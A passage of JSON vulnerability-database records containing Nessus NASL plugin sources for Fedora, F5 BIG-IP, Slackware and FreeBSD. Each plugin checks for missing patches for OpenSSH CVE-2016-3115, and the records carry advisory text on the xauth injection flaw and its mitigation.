or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"gsi-openssh-6.9p1-8.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gsi-openssh\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-12T10:13:58", "description": "Sync with openssh package.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-05-09T00:00:00", "title": "Fedora 24 : gsi-openssh-7.2p2-2.fc24 (2016-08e5803496)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "modified": "2016-05-09T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:gsi-openssh", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-08E5803496.NASL", "href": "https://www.tenable.com/plugins/nessus/90947", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-08e5803496.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90947);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3115\");\n script_xref(name:\"FEDORA\", value:\"2016-08e5803496\");\n\n script_name(english:\"Fedora 24 : gsi-openssh-7.2p2-2.fc24 (2016-08e5803496)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sync with openssh package.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1318201\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-May/184264.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?57a55728\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gsi-openssh package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gsi-openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"gsi-openssh-7.2p2-2.fc24\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gsi-openssh\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-02-01T02:05:37", "description": "Multiple CRLF injection vulnerabilities in session.c in sshd in\nOpenSSH before 7.2p2 allow remote authenticated users to bypass\nintended shell-command restrictions via crafted X11 forwarding data,\nrelated to the (1) do_authenticated1 and (2) session_x11_req\nfunctions. 
(CVE-2016-3115)", "edition": 27, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2017-07-21T00:00:00", "title": "F5 Networks BIG-IP : SSHD session.c vulnerability (K93532943)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/a:f5:big-ip_access_policy_manager"], "id": "F5_BIGIP_SOL93532943.NASL", "href": "https://www.tenable.com/plugins/nessus/101859", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K93532943.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101859);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2016-3115\");\n\n script_name(english:\"F5 Networks BIG-IP : SSHD session.c vulnerability (K93532943)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple CRLF injection vulnerabilities in session.c in sshd in\nOpenSSH before 7.2p2 allow remote authenticated users to bypass\nintended shell-command restrictions via crafted X11 forwarding data,\nrelated to the (1) 
do_authenticated1 and (2) session_x11_req\nfunctions. (CVE-2016-3115)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K93532943\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K93532943.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! 
get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K93532943\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.3\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"14.0.0\",\"13.0.0\",\"12.1.3\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.3\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"14.0.0\",\"13.0.0\",\"12.1.3\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.3\",\"11.2.1\",\"10.2.1-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"14.0.0\",\"13.0.0\",\"12.1.3\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.3\",\"11.2.1\",\"10.2.1-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"14.0.0\",\"13.0.0\",\"12.1.3\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.3\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"14.0.0\",\"13.0.0\",\"12.1.3\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.3\",\"11.2.1\",\"10.2.1-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"14.0.0\",\"13.0.0\",\"12.1.3\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.3\",\"11.2.1\",\"10.2.1-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"14.0.0\",\"13.0.0\",\"12.1.3\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.3\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"14.0.0\",\"13.0.0\",\"12.1.3\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, 
sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-17T09:10:51", "description": "New openssh packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix security issues.", "edition": 24, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-11T00:00:00", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : openssh (SSA:2016-070-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "modified": "2016-03-11T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:13.37", "p-cpe:/a:slackware:slackware_linux:openssh", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.1"], "id": "SLACKWARE_SSA_2016-070-01.NASL", "href": "https://www.tenable.com/plugins/nessus/89836", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-070-01. 
The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89836);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-3115\");\n script_xref(name:\"SSA\", value:\"2016-070-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : openssh (SSA:2016-070-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New openssh packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.517960\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3eab48b0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", 
pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-06T10:59:18", "description": "The OpenSSH project reports :\n\nMissing sanitisation of untrusted input allows an authenticated user\nwho is able to request X11 forwarding to inject commands to xauth(1).\n\nInjection of xauth commands grants the ability to read arbitrary files\nunder the authenticated user's privilege, Other xauth commands allow\nlimited information leakage, file overwrite, port probing and\ngenerally expose xauth(1), which was not written with a hostile user\nin mind, as an attack surface.\n\nMitigation :\n\nSet 
X11Forwarding=no in sshd_config. This is the default.\n\nFor authorized_keys that specify a 'command' restriction, also set the\n'restrict' (available in OpenSSH >=7.2) or 'no-x11-forwarding'\nrestrictions.", "edition": 26, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-14T00:00:00", "title": "FreeBSD : openssh -- command injection when X11Forwarding is enabled (e4644df8-e7da-11e5-829d-c80aa9043978)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "modified": "2016-03-14T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:openssh-portable"], "id": "FREEBSD_PKG_E4644DF8E7DA11E5829DC80AA9043978.NASL", "href": "https://www.tenable.com/plugins/nessus/89897", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89897);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-3115\");\n script_xref(name:\"FreeBSD\", value:\"SA-16:14.openssh\");\n\n script_name(english:\"FreeBSD : openssh -- command injection when X11Forwarding is enabled (e4644df8-e7da-11e5-829d-c80aa9043978)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The OpenSSH project reports :\n\nMissing sanitisation of untrusted input allows an authenticated user\nwho is able to request X11 forwarding to 
inject commands to xauth(1).\n\nInjection of xauth commands grants the ability to read arbitrary files\nunder the authenticated user's privilege, Other xauth commands allow\nlimited information leakage, file overwrite, port probing and\ngenerally expose xauth(1), which was not written with a hostile user\nin mind, as an attack surface.\n\nMitigation :\n\nSet X11Forwarding=no in sshd_config. This is the default.\n\nFor authorized_keys that specify a 'command' restriction, also set the\n'restrict' (available in OpenSSH >=7.2) or 'no-x11-forwarding'\nrestrictions.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.openssh.com/txt/x11fwd.adv\"\n );\n # https://vuxml.freebsd.org/freebsd/e4644df8-e7da-11e5-829d-c80aa9043978.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8a7b4781\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:openssh-portable\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is 
